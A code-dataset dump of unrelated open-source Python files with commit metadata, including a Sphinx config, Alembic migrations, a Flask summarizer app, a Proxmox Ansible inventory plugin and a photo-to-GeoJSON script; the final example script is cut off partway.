# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
# import os
# import sys
# sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = ['sphinx.ext.githubpages']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'lilik_playbook'
copyright = u'2017, edoput, kaos, slash'
author = u'edoput, kaos, slash'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = u'0.1'
# The full version, including alpha/beta/rc tags.
release = u'0.1'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This patterns also effect to html_static_path and html_extra_path
exclude_patterns = []
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = 'alabaster'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#
# html_theme_options = {}
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# -- Options for HTMLHelp output ------------------------------------------
# Output file base name for HTML help builder.
htmlhelp_basename = 'lilik_playbookdoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'lilik_playbook.tex', u'lilik\\_playbook Documentation',
u'edoput, kaos, slash', 'manual'),
]
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'lilik_playbook', u'lilik_playbook Documentation',
[author], 1)
]
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'lilik_playbook', u'lilik_playbook Documentation',
author, 'lilik_playbook', 'One line description of project.',
'Miscellaneous'),
]
| cc0-1.0 | Python |
|
871e9e4bdca027e577bdcde38f483e2de32c8528 | Add simple example | life360/apns-proxy-server,life360/apns-proxy-server,voyagegroup/apns-proxy-server,voyagegroup/apns-proxy-server | examples/simple.py | examples/simple.py | # -*- coding: utf-8 -*-
import time
from apns_proxy_client import APNSProxyClient
valid_token = "YOUR VALID TOKEN"
def main():
client = APNSProxyClient(host="localhost", port=5556, application_id="14")
i = 0
with client:
token = valid_token
client.send(token, 'Alert with default sound')
time.sleep(2)
client.send(token, 'Alert with custom sound', sound='custom')
time.sleep(2)
client.send(token, 'I am silent', sound=None)
time.sleep(2)
client.send(token, 'Alert with badge', badge=2)
time.sleep(2)
client.send(token, None, badge=99, sound=None)
time.sleep(2)
one_hour_later = int(time.time()) + (60 * 60)
client.send(token, 'I am long life', expiry=one_hour_later)
time.sleep(2)
client.send(token, 'I am low priority', priority=5)
time.sleep(2)
# For background fetch
client.send(token, None, sound=None, content_available=True)
time.sleep(2)
client.send(token, 'With custom field', custom={
'foo': True,
'bar': [200, 300],
'boo': "Hello"
})
time.sleep(2)
client.send(token, {
'body': 'This is JSON alert',
'action_loc_key': None,
'loc_key': 'loc key',
'loc_args': ['one', 'two'],
'launch_image': 'aa.png'
})
client.send(token, 'This message never send to device', test=True)
if __name__ == "__main__":
main()
print("Done")
| bsd-2-clause | Python |
|
9f7bd49350b0d1b8a8986b28db75a5b369bf7bb5 | Add py solution for 393. UTF-8 Validation | ckclark/leetcode,ckclark/leetcode,ckclark/leetcode,ckclark/leetcode,ckclark/leetcode,ckclark/leetcode | py/utf-8-validation.py | py/utf-8-validation.py | class Solution(object):
def validUtf8(self, data):
"""
:type data: List[int]
:rtype: bool
"""
it = iter(data)
while True:
try:
c = it.next() & 0xff
try:
t = 0x80
n = 0
while t > 0:
if t & c:
n += 1
t >>= 1
else:
break
if n == 1 or n > 4:
return False
elif n > 1:
for _ in xrange(n - 1):
c = it.next() & 0xff
if c & 0xc0 != 0x80:
return False
except StopIteration:
return False
except StopIteration:
return True
| apache-2.0 | Python |
|
fb70822079c47962f0f713bcea43af80fe58d93e | add example using the VTKMesh class | simphony/simphony-mayavi | examples/mesh_vtk_example.py | examples/mesh_vtk_example.py | from numpy import array
from simphony.cuds.mesh import Point, Cell, Edge, Face
from simphony.core.data_container import DataContainer
from simphony_mayavi.cuds.api import VTKMesh
points = array([
[0, 0, 0], [1, 0, 0], [0, 1, 0], [0, 0, 1],
[2, 0, 0], [3, 0, 0], [3, 1, 0], [2, 1, 0],
[2, 0, 1], [3, 0, 1], [3, 1, 1], [2, 1, 1]],
'f')
cells = [
[0, 1, 2, 3], # tetra
[4, 5, 6, 7, 8, 9, 10, 11]] # hex
faces = [[2, 7, 11]]
edges = [[1, 4], [3, 8]]
mesh = VTKMesh('example')
# add points
uids = [
mesh.add_point(
Point(coordinates=point, data=DataContainer(TEMPERATURE=index)))
for index, point in enumerate(points)]
# add edges
edge_uids = [
mesh.add_edge(
Edge(points=[uids[index] for index in element]))
for index, element in enumerate(edges)]
# add faces
face_uids = [
mesh.add_face(
Face(points=[uids[index] for index in element]))
for index, element in enumerate(faces)]
# add cells
cell_uids = [
mesh.add_cell(
Cell(points=[uids[index] for index in element]))
for index, element in enumerate(cells)]
if __name__ == '__main__':
from simphony.visualisation import mayavi_tools
# Visualise the Mesh object
mayavi_tools.show(mesh)
| bsd-2-clause | Python |
|
bdc062830a943a312dc6b56002f5ca6ae3990b80 | add example | cupy/cupy,cupy/cupy,cupy/cupy,cupy/cupy | examples/peer/peer_matrix.py | examples/peer/peer_matrix.py | import cupy
def main():
gpus = cupy.cuda.runtime.getDeviceCount()
for peerDevice in range(gpus):
for device in range(gpus):
if peerDevice == device:
continue
flag = cupy.cuda.runtime.deviceCanAccessPeer(device, peerDevice)
print(
f'Can access #{peerDevice} memory from #{device}: '
f'{flag == 1}')
if __name__ == '__main__':
main()
| mit | Python |
|
51530297a561fa9630f69c70810c1b4bbeb7ecf0 | Create testmessage table | dropbox/changes,dropbox/changes,dropbox/changes,dropbox/changes | migrations/versions/187eade64ef0_create_testmessage_table.py | migrations/versions/187eade64ef0_create_testmessage_table.py | """Create testmessage table
Revision ID: 187eade64ef0
Revises: 016f138b2da8
Create Date: 2016-06-21 16:11:47.905481
"""
# revision identifiers, used by Alembic.
revision = '187eade64ef0'
down_revision = '016f138b2da8'
from alembic import op
import sqlalchemy as sa
def upgrade():
op.create_table(
'testmessage',
sa.Column('id', sa.GUID(), nullable=False),
sa.Column('test_id', sa.GUID(), nullable=False),
sa.Column('artifact_id', sa.GUID(), nullable=False),
sa.Column('start_offset', sa.Integer(), nullable=False),
sa.Column('length', sa.Integer(), nullable=False),
sa.PrimaryKeyConstraint('id'),
sa.ForeignKeyConstraint(['test_id'], ['test.id'], ondelete='CASCADE'),
sa.ForeignKeyConstraint(['artifact_id'], ['artifact.id'], ondelete='CASCADE'),
)
op.create_index('idx_testmessage_test_id', 'testmessage', ['test_id'], unique=False)
def downgrade():
op.drop_table('testmessage')
| apache-2.0 | Python |
|
cc84a5c71f84596af61b2de4a16cd62ff0209b16 | Add migration file | l-vincent-l/APITaxi,l-vincent-l/APITaxi,odtvince/APITaxi,openmaraude/APITaxi,openmaraude/APITaxi,odtvince/APITaxi,odtvince/APITaxi,odtvince/APITaxi | migrations/versions/fd02d1c7d64_add_hail_migration_fields.py | migrations/versions/fd02d1c7d64_add_hail_migration_fields.py | """Add hail migration fields
Revision ID: fd02d1c7d64
Revises: 59e5faf237f8
Create Date: 2015-04-15 12:04:43.286358
"""
# revision identifiers, used by Alembic.
revision = 'fd02d1c7d64'
down_revision = '59e5faf237f8'
from alembic import op
import sqlalchemy as sa
from sqlalchemy.dialects import postgresql
def upgrade():
### commands auto generated by Alembic - please adjust! ###
op.create_table('hail',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('creation_datetime', sa.DateTime(), nullable=False),
sa.Column('client_id', sa.Integer(), nullable=False),
sa.Column('client_lon', sa.Float(), nullable=False),
sa.Column('client_lat', sa.Float(), nullable=False),
sa.Column('taxi_id', sa.Integer(), nullable=False),
sa.Column('status', sa.Enum('emitted', 'received', 'sent_to_operator', 'received_by_operator', 'received_by_taxi', 'accepted_by_taxi', 'declined_by_taxi', 'incident_client', 'incident_taxi', 'timeout_client', 'timeout_taxi', 'outdated_client', 'outdated_taxi', name='hail_status'), nullable=False),
sa.Column('last_status_change', sa.DateTime(), nullable=True),
sa.PrimaryKeyConstraint('id')
)
### end Alembic commands ###
def downgrade():
### commands auto generated by Alembic - please adjust! ###
op.drop_table('hail')
### end Alembic commands ###
| agpl-3.0 | Python |
|
dde52eb2bb035644e1147bbe21fcf9b1200a2e6b | Add example of section tree from SWC data block. | mgeplf/NeuroM,juanchopanza/NeuroM,wizmer/NeuroM,BlueBrain/NeuroM,liesbethvanherpe/NeuroM,lidakanari/NeuroM,eleftherioszisis/NeuroM | examples/section_tree_swc.py | examples/section_tree_swc.py | '''Example showing how to extract section information from SWC block'''
import numpy as np
from neurom import ezy
from neurom.io import swc
from neurom.core.tree import Tree
from neurom.core import section_neuron as sn
from neurom.core.dataformat import COLS
from neurom.core.dataformat import POINT_TYPE
class Section(object):
'''sections (id, (ids), type, parent_id)'''
def __init__(self, idx, ids=None, ntype=0, pid=-1):
self.id = idx
self.ids = [] if ids is None else ids
self.ntype = ntype
self.pid = pid
def __str__(self):
return 'Section(id=%s, ids=%s, ntype=%s, pid=%s)' % (self.id, self.ids,
self.ntype, self.pid)
def neurite_trunks(data_wrapper):
'''Get the section IDs of the intitial neurite sections'''
sec = data_wrapper.sections
return [ss.id for ss in sec
if ss.pid is not None and (sec[ss.pid].ntype == POINT_TYPE.SOMA and
ss.ntype != POINT_TYPE.SOMA)]
def soma_points(data_wrapper):
'''Get the soma points'''
db = data_wrapper.data_block
return db[db[:, COLS.TYPE] == POINT_TYPE.SOMA]
def add_sections(data_wrapper):
'''Make a list of sections from an SWC data wrapper'''
# get SWC ID to array position map
id_map = {-1: -1}
for i, r in enumerate(data_wrapper.data_block):
id_map[int(r[COLS.ID])] = i
fork_points = set(id_map[p] for p in data_wrapper.get_fork_points())
end_points = set(id_map[p] for p in data_wrapper.get_end_points())
section_end_points = fork_points | end_points
_sections = [Section(0)]
curr_section = _sections[-1]
parent_section = {-1: None}
for row in data_wrapper.data_block:
row_id = id_map[int(row[COLS.ID])]
if len(curr_section.ids) == 0:
curr_section.ids.append(id_map[int(row[COLS.P])])
curr_section.ntype = int(row[COLS.TYPE])
curr_section.ids.append(row_id)
if row_id in section_end_points:
parent_section[curr_section.ids[-1]] = curr_section.id
_sections.append(Section(len(_sections)))
curr_section = _sections[-1]
# get the section parent ID from the id of the first point.
for sec in _sections:
if sec.ids:
sec.pid = parent_section[sec.ids[0]]
data_wrapper.sections = [s for s in _sections if s.ids]
return data_wrapper
def make_tree(data_wrapper, start_node=0, post_action=None):
'''Build a section tree'''
# One pass over sections to build nodes
nodes = [Tree(np.array(data_wrapper.data_block[sec.ids]))
for sec in data_wrapper.sections[start_node:]]
# One pass over nodes to connect children to parents
for i in xrange(len(nodes)):
parent_id = data_wrapper.sections[i + start_node].pid - start_node
if parent_id >= 0:
nodes[parent_id].add_child(nodes[i])
if post_action is not None:
post_action(nodes[0])
return nodes[0]
def load_neuron(filename, tree_action=sn.set_neurite_type):
'''Build section trees from an h5 file'''
data_wrapper = swc.SWC.read(filename)
add_sections(data_wrapper)
trunks = neurite_trunks(data_wrapper)
trees = [make_tree(data_wrapper, trunk, tree_action)
for trunk in trunks]
# if any neurite trunk starting points are soma,
# remove them
for t in trees:
if t.value[0][COLS.TYPE] == POINT_TYPE.SOMA:
t.value = t.value[1:]
soma = sn.make_soma(soma_points(data_wrapper))
return sn.Neuron(soma, trees, data_wrapper)
def do_new_stuff(filename):
'''Use the section trees to get some basic stats'''
_n = load_neuron(filename)
n_sec = sn.n_sections(_n)
n_seg = sn.n_segments(_n)
sec_len = sn.get_section_lengths(_n)
print 'number of sections:', n_sec
print 'number of segments:', n_seg
print 'total neurite length:', sum(sec_len)
print 'neurite types:'
for n in _n.neurites:
print n.type
def do_old_stuff(filename):
'''Use point tree to get some basic stats'''
_n = ezy.load_neuron(filename)
n_sec = ezy.get('number_of_sections', _n)[0]
n_seg = ezy.get('number_of_segments', _n)[0]
sec_len = ezy.get('section_lengths', _n)
print 'number of sections:', n_sec
print 'number of segments:', n_seg
print 'total neurite length:', sum(sec_len)
print 'neurite types:'
for n in _n.neurites:
print n.type
if __name__ == '__main__':
fname = 'test_data/swc/Neuron.swc'
nrn = load_neuron(fname)
| bsd-3-clause | Python |
|
c560be326c10c1e90b17ba5c6562f55c44dea9f3 | Create main.py | googleinterns/smart-content-summary,googleinterns/smart-content-summary,googleinterns/smart-content-summary | GCP_deploy/main.py | GCP_deploy/main.py | # Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" Web app for LaserTagger text summarizer """
from __future__ import print_function
from flask import Flask, render_template, request
from predict_main import construct_example
import nltk
import bert_example
import utils
import tagging_converter
import googleapiclient
import tagging
import bert_example_classifier
from nltk.tokenize.treebank import TreebankWordDetokenizer
from builtins import FileExistsError
app = Flask(__name__)
embedding_type = "POS"
label_map_file = "gs://publicly_available_models_yechen/best_hypertuned_POS/label_map.txt"
enable_masking = False
do_lower_case = True
try:
nltk.download('punkt')
except FileExistsError:
print("NLTK punkt exist")
try:
nltk.download('averaged_perceptron_tagger')
except FileExistsError:
print("NLTK averaged_perceptron_tagger exist")
if embedding_type == "Normal" or embedding_type == "Sentence":
vocab_file = "gs://lasertagger_training_yechen/cased_L-12_H-768_A-12/vocab.txt"
elif embedding_type == "POS":
vocab_file = "gs://bert_traning_yechen/trained_bert_uncased/bert_POS/vocab.txt"
elif embedding_type == "POS_concise":
vocab_file = "gs://bert_traning_yechen/trained_bert_uncased/bert_POS_concise/vocab.txt"
else:
raise ValueError("Unrecognized embedding type")
label_map = utils.read_label_map(label_map_file)
converter = tagging_converter.TaggingConverter(
tagging_converter.get_phrase_vocabulary_from_label_map(label_map), True)
id_2_tag = {tag_id: tagging.Tag(tag) for tag, tag_id in label_map.items()}
builder = bert_example.BertExampleBuilder(label_map, vocab_file,
128, do_lower_case, converter, embedding_type, enable_masking)
grammar_vocab_file = "gs://publicly_available_models_yechen/grammar_checker/vocab.txt"
grammar_builder = bert_example_classifier.BertGrammarExampleBuilder(grammar_vocab_file, 128, False)
def predict_json(project, model, instances, version=None):
service = googleapiclient.discovery.build('ml', 'v1')
name = 'projects/{}/models/{}'.format(project, model)
if version is not None:
name += '/versions/{}'.format(version)
response = service.projects().predict(
name=name,
body={'instances': instances}
).execute()
if 'error' in response:
raise RuntimeError(response['error'])
return response['predictions']
@app.route('/', methods=['GET'])
def home():
return render_template('index.html')
@app.route('/predict', methods=['POST'])
def predict():
inp_string = [x for x in request.form.values()]
sentence = nltk.word_tokenize(inp_string[0])
inputs, example = construct_example(sentence, builder)
val = predict_json("smart-content-summary", "Deployed_Models", [inputs])
try:
predicted_ids = val[0]["pred"]
except:
predicted_ids = val[0]
example.features['labels'] = predicted_ids
example.features['labels_mask'] = [0] + [1] * (len(predicted_ids) - 2) + [0]
labels = [id_2_tag[label_id] for label_id in example.get_token_labels()]
prediction = example.editing_task.realize_output(labels)
inputs_grammar, example_grammar = construct_example(prediction, grammar_builder)
grammar_prediction = predict_json("smart-content-summary", "grammar_checker", [inputs_grammar])
try:
grammar = grammar_prediction[0]["pred"][0]
except:
grammar = grammar_prediction[0][0]
prediction= TreebankWordDetokenizer().detokenize(prediction.split())
return render_template('index.html', input=inp_string[0], prediction_bert=prediction, grammar=grammar)
if __name__ == '__main__':
# For deploying to App Engine
app.run(host='127.0.0.1', port=8080, debug=True)
# For local deployment
# app.run(host='localhost', port=8080, debug=True)
| apache-2.0 | Python |
|
fc84c19cdbbe86b1a57efb3468cdfc26785ca4a6 | add utility helper to format table for console output | dariusbakunas/rawdisk | rawdisk/util/output.py | rawdisk/util/output.py | import numpy as np
def format_table(headers, columns, values, ruler='-'):
printable_rows = []
table = np.empty((len(values), len(columns)), dtype=object)
for row, value in enumerate(values):
table[row] = [str(getattr(value, column)) for column in columns]
column_widths = [
max(len(headers[col]), len(max(table[:, col], key=len)))
for col in range(len(columns))]
# print header
printable_rows.append(' '.join([header.ljust(column_widths[col])
for col, header in enumerate(headers)]))
printable_rows.append(' '.join(['-' * width for width in column_widths]))
for row in table:
printable_rows.append(' '.join([col.ljust(column_widths[idx])
for idx, col in enumerate(row)]))
return printable_rows
| bsd-3-clause | Python |
|
100a03003adf3f425d59b69e95078bd0f1e82193 | Add test script for segfault bug reported by Jeremy Hill. | visionegg/visionegg,visionegg/visionegg,visionegg/visionegg,visionegg/visionegg,visionegg/visionegg | test/reopen_screen.py | test/reopen_screen.py | #!/usr/bin/env python
# Test for bug reported by Jeremy Hill in which re-opening the screen
# would cause a segfault.
import VisionEgg
VisionEgg.start_default_logging(); VisionEgg.watch_exceptions()
from VisionEgg.Core import Screen, Viewport, swap_buffers
import pygame
from pygame.locals import QUIT,KEYDOWN,MOUSEBUTTONDOWN
from VisionEgg.Text import Text
from VisionEgg.Dots import DotArea2D
def run():
screen = Screen()
screen.parameters.bgcolor = (0.0,0.0,0.0) # black (RGB)
dots = DotArea2D( position = ( screen.size[0]/2.0, screen.size[1]/2.0 ),
size = ( 300.0 , 300.0 ),
signal_fraction = 0.1,
signal_direction_deg = 180.0,
velocity_pixels_per_sec = 10.0,
dot_lifespan_sec = 5.0,
dot_size = 3.0,
num_dots = 100)
text = Text( text = "Vision Egg dot_simple_loop demo.",
position = (screen.size[0]/2,2),
anchor = 'bottom',
color = (1.0,1.0,1.0))
viewport = Viewport( screen=screen, stimuli=[dots,text] )
# The main loop below is an alternative to using the
# VisionEgg.FlowControl.Presentation class.
quit_now = 0
while not quit_now:
for event in pygame.event.get():
if event.type in (QUIT,KEYDOWN,MOUSEBUTTONDOWN):
quit_now = 1
screen.clear()
viewport.draw()
swap_buffers()
screen.close()
print "run 1"
run()
print "run 2"
run()
print "done"
| lgpl-2.1 | Python |
|
35849cf3650c5815c0124f90fad3d3fa2ef9abc6 | Create InsertationSort2.py | MajidLashgarian/HackerRank,MajidLashgarian/HackerRank | InsertationSort2.py | InsertationSort2.py | def compareAndRep(numbers , a , b):
temp = numbers[a]
numbers[a] = numbers[b]
numbers[b] = temp
return numbers
def printList(numbers):
strp = ""
for i in range(0 , len(numbers)):
strp += str(numbers[i])
if(i+1 < len(numbers)):
strp += " "
print strp
N = int(raw_input())
numbers = map(int , raw_input().strip().split(" "))
for i in range(1 , N):
for j in range (0 , i ):
if(numbers[i] < numbers[j]):
numbers = compareAndRep(numbers , i , j)
printList(numbers)
| mit | Python |
|
45136a5757ed362818216acdb390bb0c43bf35f7 | Create photos2geojson.py | trolleway/photo_tools | photos2map/photos2geojson.py | photos2map/photos2geojson.py | # -*- coding: UTF-8 -*-
import os, sys
import exiftool
import json
from fractions import Fraction
def progress(count, total, status=''):
bar_len = 60
filled_len = int(round(bar_len * count / float(total)))
percents = round(100.0 * count / float(total), 1)
bar = '=' * filled_len + '-' * (bar_len - filled_len)
sys.stdout.write('[%s] %s%s ...%s\r' % (bar, percents, '%', status))
sys.stdout.flush() # As suggested by Rom Ruben (see: http://stackoverflow.com/questions/3173320/text-progress-bar-in-the-console/27871113#comment50529068_27871113)
def get_args():
import argparse
p = argparse.ArgumentParser(description='Move images to folder with his date')
p.add_argument('path', help='Path to folder containing JPG files')
return p.parse_args()
def _get_if_exist(data, key):
if key in data:
return data[key]
return None
geojsonHeader='''
{
"type": "FeatureCollection",
"crs": { "type": "name", "properties": { "name": "urn:ogc:def:crs:OGC:1.3:CRS84" } },
"features": [
'''
geojsonFooter='''
]
}
'''
if __name__ == '__main__':
args = get_args()
file_list = []
for root, sub_folders, files in os.walk(args.path):
for name in files:
file_list += [os.path.join(root, name) ]
fs = open('photos.geojson','w')
fs.write(geojsonHeader+"\n")
fs.close()
fs = open('photos.geojson','a')
index = 0
IterationStep = 200
total = len(file_list)
while index < total:
with exiftool.ExifTool() as et:
metadata = et.get_tags_batch(['EXIF:GPSLongitude','EXIF:GPSLatitude','DateTimeOriginal'],file_list[index:index+IterationStep])
for record in metadata:
dict = json.dumps(record)
#print dict
geojsonString='{ "type": "Feature", "properties": { "filename": "%(SourceFile)s", "datetime": "%(EXIF:DateTimeOriginal)s" }, "geometry": { "type": "Point", "coordinates": [ %(EXIF:GPSLongitude)s, %(EXIF:GPSLatitude)s ] } }, '
exportString = geojsonString % {"SourceFile" : record['SourceFile'],'EXIF:DateTimeOriginal' : _get_if_exist(record,'EXIF:DateTimeOriginal'),"EXIF:GPSLatitude" : _get_if_exist(record,'EXIF:GPSLatitude'),"EXIF:GPSLongitude" : _get_if_exist(record,'EXIF:GPSLongitude')}
if _get_if_exist(record,'EXIF:GPSLatitude') and _get_if_exist(record,'EXIF:GPSLongitude'):
fs.write(exportString+"\n")
index = index+IterationStep
if index > total:
index=total
progress(index, len(file_list), status='Create geojson with photo locations, total = '+str(total))
fs = open('photos.geojson','a')
fs.write(geojsonFooter+"\n")
fs.close()
'''
cmd = ['exiftool', filepath]
p = subprocess.Popen(cmd, stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
stdin=subprocess.PIPE)
out, err = p.communicate('-GPSLongitude')
print out
'''
'''
mt = mimetypes.guess_type(filepath)[0]
if mt:
f = open(filepath, 'rb')
tags = exifread.process_file(f)
lat,lon = get_lat_lon(tags)
#print filepath.ljust(50),str(lat).ljust(20), str(lon).ljust(20)
exiftool E:\PHOTO\z_bat\geo\test1\IMG_20150228_231555.jpg"" -GPSLongitude -GPSLatitude --n -json
exiftool -stay_open True -@
'''
#python geo3.py "E:\PHOTO\z_bat\geo\test1"
| unlicense | Python |
|
97e46b93124758bec85d2e81a6843c22a265bce3 | Add entry point for GC repo importer | heiths/allura,apache/incubator-allura,heiths/allura,lym/allura-git,apache/allura,apache/allura,apache/incubator-allura,apache/allura,lym/allura-git,lym/allura-git,heiths/allura,heiths/allura,apache/incubator-allura,heiths/allura,lym/allura-git,apache/allura,apache/incubator-allura,apache/allura,lym/allura-git | ForgeImporters/setup.py | ForgeImporters/setup.py | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from setuptools import setup, find_packages
setup(name='ForgeImporters',
description="",
long_description="",
classifiers=[],
keywords='',
author='',
author_email='',
url='',
license='',
packages=find_packages(exclude=['ez_setup', 'examples', 'tests']),
include_package_data=True,
zip_safe=False,
install_requires=['Allura', ],
entry_points="""
# -*- Entry points: -*-
[allura.project_importers]
google-code = forgeimporters.google.project:GoogleCodeProjectImporter
[allura.importers]
google-code-repo = forgeimporters.google.code:GoogleRepoImporter
""",)
| # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from setuptools import setup, find_packages
setup(name='ForgeImporters',
description="",
long_description="",
classifiers=[],
keywords='',
author='',
author_email='',
url='',
license='',
packages=find_packages(exclude=['ez_setup', 'examples', 'tests']),
include_package_data=True,
zip_safe=False,
install_requires=['Allura', ],
entry_points="""
# -*- Entry points: -*-
[allura.project_importers]
google-code = forgeimporters.google.project:GoogleCodeProjectImporter
[allura.importers]
""",)
| apache-2.0 | Python |
76f473cd5d5a8ed1c6c5deb173587ce01e5b8f29 | add a proxmox inventory plugin | thaim/ansible,thaim/ansible | plugins/inventory/proxmox.py | plugins/inventory/proxmox.py | #!/usr/bin/env python
# Copyright (C) 2014 Mathieu GAUTHIER-LAFAYE <[email protected]>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import urllib
import urllib2
try:
import json
except ImportError:
import simplejson as json
import os
import sys
from optparse import OptionParser
class ProxmoxNodeList(list):
def get_names(self):
return [node['node'] for node in self]
class ProxmoxQemuList(list):
def get_names(self):
return [qemu['name'] for qemu in self if qemu['template'] != 1]
class ProxmoxPoolList(list):
def get_names(self):
return [pool['poolid'] for pool in self]
class ProxmoxPool(dict):
def get_members_name(self):
return [member['name'] for member in self['members'] if member['template'] != 1]
class ProxmoxAPI(object):
def __init__(self, options):
self.options = options
self.credentials = None
if not options.url:
raise Exception('Missing mandatory parameter --url (or PROXMOX_URL).')
elif not options.username:
raise Exception('Missing mandatory parameter --username (or PROXMOX_USERNAME).')
elif not options.password:
raise Exception('Missing mandatory parameter --password (or PROXMOX_PASSWORD).')
def auth(self):
request_path = '{}api2/json/access/ticket'.format(self.options.url)
request_params = urllib.urlencode({
'username': self.options.username,
'password': self.options.password,
})
data = json.load(urllib2.urlopen(request_path, request_params))
self.credentials = {
'ticket': data['data']['ticket'],
'CSRFPreventionToken': data['data']['CSRFPreventionToken'],
}
def get(self, url, data=None):
opener = urllib2.build_opener()
opener.addheaders.append(('Cookie', 'PVEAuthCookie={}'.format(self.credentials['ticket'])))
request_path = '{}{}'.format(self.options.url, url)
request = opener.open(request_path, data)
response = json.load(request)
return response['data']
def nodes(self):
return ProxmoxNodeList(self.get('api2/json/nodes'))
def node_qemu(self, node):
return ProxmoxQemuList(self.get('api2/json/nodes/{}/qemu'.format(node)))
def pools(self):
return ProxmoxPoolList(self.get('api2/json/pools'))
def pool(self, poolid):
return ProxmoxPool(self.get('api2/json/pools/{}'.format(poolid)))
def main_list(options):
result = {}
proxmox_api = ProxmoxAPI(options)
proxmox_api.auth()
# all
result['all'] = []
for node in proxmox_api.nodes().get_names():
result['all'] += proxmox_api.node_qemu(node).get_names()
# pools
for pool in proxmox_api.pools().get_names():
result[pool] = proxmox_api.pool(pool).get_members_name()
print json.dumps(result)
def main_host():
print json.dumps({})
def main():
parser = OptionParser(usage='%prog [options] --list | --host HOSTNAME')
parser.add_option('--list', action="store_true", default=False, dest="list")
parser.add_option('--host', dest="host")
parser.add_option('--url', default=os.environ.get('PROXMOX_URL'), dest='url')
parser.add_option('--username', default=os.environ.get('PROXMOX_USERNAME'), dest='username')
parser.add_option('--password', default=os.environ.get('PROXMOX_PASSWORD'), dest='password')
(options, args) = parser.parse_args()
if options.list:
main_list(options)
elif options.host:
main_host()
else:
parser.print_help()
sys.exit(1)
if __name__ == '__main__':
main()
| mit | Python |
|
1e7421878e90949abc4f6fac5835bd27b472d2b6 | Add example script for the newly added mixed_diffusivity | TomTranter/OpenPNM,PMEAL/OpenPNM | example_Knudsen.py | example_Knudsen.py | import openpnm as op
import numpy as np
import matplotlib.pyplot as plt
# Get Deff w/o including Knudsen effect
spacing = 1.0
net = op.network.Cubic(shape=[10, 10, 10], spacing=spacing)
geom = op.geometry.StickAndBall(network=net)
air = op.phases.Air(network=net)
phys = op.physics.Standard(network=net, geometry=geom, phase=air)
fd = op.algorithms.FickianDiffusion(network=net, phase=air)
fd.set_value_BC(pores=net.pores("left"), values=1.0)
fd.set_value_BC(pores=net.pores("right"), values=0.0)
fd.run()
L = (net.shape * net.spacing)[1]
A = (net.shape * net.spacing)[[0, 2]].prod()
Mdot = fd.rate(pores=net.pores("left")).squeeze()
